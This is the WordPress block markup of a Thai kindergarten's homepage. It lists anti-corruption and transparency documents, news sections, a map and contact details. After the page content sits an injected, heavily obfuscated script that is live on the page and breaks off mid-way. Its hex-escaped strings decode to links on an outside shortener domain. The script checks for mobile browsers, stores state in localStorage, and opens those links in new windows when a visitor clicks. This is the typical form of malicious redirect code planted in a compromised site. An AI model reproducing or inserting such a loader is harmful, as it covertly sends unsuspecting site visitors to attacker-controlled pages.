data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 